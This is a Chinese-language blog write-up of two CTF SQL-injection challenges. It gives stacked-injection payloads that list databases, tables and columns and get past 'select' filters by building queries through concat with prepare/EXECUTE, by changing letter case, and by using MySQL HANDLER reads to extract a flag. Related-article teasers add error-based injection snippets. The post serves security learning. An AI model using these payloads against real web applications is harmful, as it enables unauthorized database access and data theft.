堆叠注入的不同姿势——SQL注入写题笔记

最新推荐文章于 2024-09-10 14:35:22 发布
最新推荐文章于 2024-09-10 14:35:22 发布
阅读量659 收藏 14
点赞数 21
分类专栏: CTF写题 文章标签: sql 笔记 安全 学习 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_82847928/article/details/141873811
版权

目录

[强网杯 2019]随便注

方法一、set,prepare预编译

方法二,使用handler命令

[GYCTF2020]Blacklist

[强网杯 2019]随便注

先进行简单测试

?inject=1' and 1=1--+

出现回显

发现存在字符型SQL注入漏洞,但是’#‘无法使用

接下来尝试使用order by确认当前表的字段数为2

继续使用union联合注入,发现回显正则表达式。

select被过滤且无法大小写和双写绕过。

尝试堆叠注入。

?inject=1';show databases;--+

成功回显!那么爆当前数据库的表

?inject=1';show tables;--+

感觉第一张表有问题,继续爆该表字段

(这里要注意纯数字作为表名要加反引号`19198109311141514`)

?inject=1';show columns from `1919810931114514`;--+

成功得到字段“flag”,很明显我们就只剩最后一步,爆出该字段的数据即可。

但是select已经被比较严格地过滤了,我们需要寻找其他方法。

方法一、set,prepare预编译

使用预编译来组成我们想要执行的SQL语句‘select flag from `1919810931114514`'

故构造如下payload

?inject=1';set @sql=concat('sel','ect flag from `1919810931114514`');prepare a from @sql;EXECUTE a;--+

得到回显

使用了strstr对set和prepare过滤,但是这个函数过滤并不严格,采用大小写绕过。

?inject=1';Set @sql=concat('sel','ect flag from `1919810931114514`');Prepare a from @sql;EXECUTE a;--+

方法二,使用handler命令

handler命令是mysql专有的一个查询表数据的函数,但是不如select功能强大。

基本语法:handler table_name OPEN 打开表

                  handler  table_name read first 读表的第一行

                  handler table_name read next 读下一行

                  handler table_name close 关闭表

用该命令构造payload

?inject=1';Handler `1919810931114514` open ;Handler`1919810931114514` read first;--+

得到flag。

[GYCTF2020]Blacklist

这道题与第一题相似度很高,但是正则表达式过滤的范围有所差别。

可以看到把我们第一种方法使用的set和prepare都过滤了,不过没有关系,我们继续使用handler构造payload!

中间的解题过程笔者不详细展示了,与第一题相似度极高。

最后的payload

?inject=1';handler FlagHere open;handler FlagHere read first;--+

得到flag。

Double evil
关注
  • 21
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
紫光档案管理系统selectFileRemote接口存在SQL注入漏洞
nnn2188185的博客
09-03 77
紫光档案管理系统selectFileRemote接口存在SQL注入漏洞
mysql报错注入手工方法
weixin_30725467的博客
04-11 176
以前觉得报错注入有那么一长串,还有各种concat(),rand()之类的函数,不方便记忆和使用,一直没怎么仔细的学习过。这次专门学习了一下,看了一些大牛的总结,得到一些经验,特此记录下来,以备后续巩固复习。 总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面中没有显示位,但是用echo mysql_error();输出了错误信息时使用。 公式具体如下 and(selec...
sql注入过滤select_SQL注入高级进阶-堆叠注入
weixin_39808803的博客
11-21 1346
原理0x00 堆叠注入定义 Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。0x01 堆叠注入原理 在SQL中,分号(;)是用来表示一条s...
SQL注入 手注与联合注入
weixin_30375427的博客
04-22 173
SQL注入,吧sql命令插入到WEB表单,或输入域名或页面亲求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令; 得到数据库用户名和密码 1:在以,{ .asp?id=32(任意数字) }结尾的链接依次添加{ ‘ }【 and 1=1 】和【and 1=2】,来判断是否存在注入点。 2:【and exists(select*from admin)】,根据页面返回...
MySQL手工报错注入
L_KevinK的博客
08-01 1156
MySQL手工报错注入(1)测试注入点是否可用(2)爆数据库相关信息(2)爆数据库表名 (1)测试注入点是否可用 1后加 ’ 号页面报错,爆出错误信息 (2)爆数据库相关信息 报错注入语句有多种,此贴仅讲适用于此网站的一种 and updatexml(1,concat(0x7e,(select user()),0x7e),1)-- #爆数据库用户 and updatexml(1,c...
SQL Injection8(堆叠注入)——强网杯2019随便注
热门推荐
kid的博客
05-28 1万+
SQL Injection8(堆叠注入)——强网杯2019随便注 前言 前面参加强网杯线上赛,亲身体验了一把ctf从入门到入土,从打ctf变成被ctf打… 这里结合里面的题来对里面的知识点进行一个学习总结 随便注是一道sql注入题,因为过滤规则十分强大,所以很难… 这里会用到堆叠注入的知识,堆叠注入前面有所了解,觉得并不难,所以也没练习过,但做这道题的时候就又些懵了。 堆叠注入原理 在SQL中,...
啊D——SQL注入工具
12-01
啊D注入工具
SQL注入——mssql注入
01-19
可以在 SQL Server 中执行任何活动。 serveradmin  可以设置服务器范围的配置选项,关闭服务器。 setupadmin 可以管理链接服务器和启动过程,并执行某些系统存储过程(sp_...
WEB渗透学习笔记4——堆叠注入和二次注入
林林木林林L的博客
07-24 2248
堆叠查询注入攻击 Stackedinjections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql 语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而 unioninjection(
SQL注入——堆叠注入
Zhujiangcheng的博客
06-08 923
SQL注入简介——堆叠注入(一)SQL注入的概述和分类1.概述2.分类①按照数据提交的方式来分类:②按照执行效果来分类:③按照注入点类型来分类:(二)堆叠注入1.概念2.局限 (一)SQL注入的概述和分类 1.概述   首先说,什么是SQL注入?   程序员在开发用户和数据库交互的系统时没有对用户输入的字符串进行过滤、转义、限制,或者处理不严谨,导致用户可以通过输入精心构造的字符串去非法获取到数据库中的数据,这一构造字符串非法获取数据的过程就被称为SQL注入。 2.分类 (参考来源: link.) ①按照数
[SQL注入][强网杯 2019]随便注(三种姿势)
Y4tacker的博客
08-05 8252
文章目录姿势一 ---- 常规堆叠注入姿势二---预处理语句姿势三 --- handeler参考文章 前言: 1919810931114514必须用反单引号括起来,但是words不需要,应该是和数据类型有关 姿势一 ---- 常规堆叠注入 堆叠注入为攻击者提供了很多控制权,与仅限于SELECT语句的UNION联合查询攻击不同堆叠注入可以用于执行任何SQL语句。 首先老规矩输入1 加个单引号,报错 注释掉后面大概猜到表的结构了selsect id,data from words where id =,并
墨者-SQL注入漏洞测试(报错盲注)
wh1sper、的博客
07-04 798
墨者-SQL注入漏洞测试前言一、sqlmap二、手注1.报错注入2.时间注入3.联合查询union被过滤总结 前言 本题为墨者学院在线靶场 进入题目发现是个登录界面,找了好久,最后在关于平台停机维护的通知的页面找到了注入点 判断注入类型,当输入?id=1’ and 1=1 %23时,页面显示正常。 ?id=1' and 1=1 %23 当输入?id=1’ and 1=2 %23时,页面显示不正常。 由此判断注入类型为单字符注入。 一、sqlmap 首先先清理sqlmap的缓存。 python sq
mysql注_MySQL手注报错注入
weixin_39969340的博客
01-28 130
报错注入:指在页面中没有一个合适的数据返回点的情况下,利用mysql函数的报错来创造一个显位的注入。先来了解一下报错注入常用的函数XML:指可扩展标记语言被设计用来传输和存储数据。concat:返回结果为连接参数产⽣的字符串报错注入常用的函数:extractvalue():对XML文档进行查询的函数语法:extractvalue(目标xml文档,xml路径)第二个参数xml中的位置是可操作的地方,...
pandas读取xlsx文件使用sqlachemy写到数据库
最新发布
ithongchou的博客
09-10 372
如果你使用的是特定的数据库(如 SQLite、PostgreSQL、MySQL),你还需要安装相应的数据库驱动。通过这些步骤,你可以方便地将 Excel 文件中的数据写入数据库。连接字符串的格式取决于你使用的数据库。(用于读取 Excel 文件)。方法将 DataFrame 数据写入数据库。读取 Excel 文件。
【网络安全】空字节绕过:URL回调+XSS+SQL绕WAF
等风来
09-07 361
经过进一步测试,我发现WAF在解析HTTP请求时,如果发现恶意查询,会导致服务器挂起。如果我连续提交3个请求且服务器挂起,它就会阻止我的IP地址。
被低估的SQL
weixin_61431494的博客
09-03 1570
虽然SQL的核心功能强大,但自定义函数和存储过程常常被低估。它们可以封装复杂的业务逻辑,从而提高数据库操作的效率和一致性。存储过程不仅可以接收参数,还能执行多条SQL语句,并处理事务。ASBEGIN-- 可能的其他初始化操作END;这种封装能够保证操作的原子性,同时提升了数据库应用的性能和安全性。
SQL的高级查询练习知识点(day24)
新手小袁
09-05 1168
SQL的高级查询练习知识点,主要关于SQL的练习题,适用于新手练习,主要简述基础查询,条件查询等知识点
postgreSQL 除法运算返回0
日日留心的技术专栏
09-05 338
postgreSQL 进行除法运算,应该使用round+numeric 类型,否则当计算结果小于1 时返回0,大于1 时只返回整数部分.postgreSQL 除法运算返回0。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值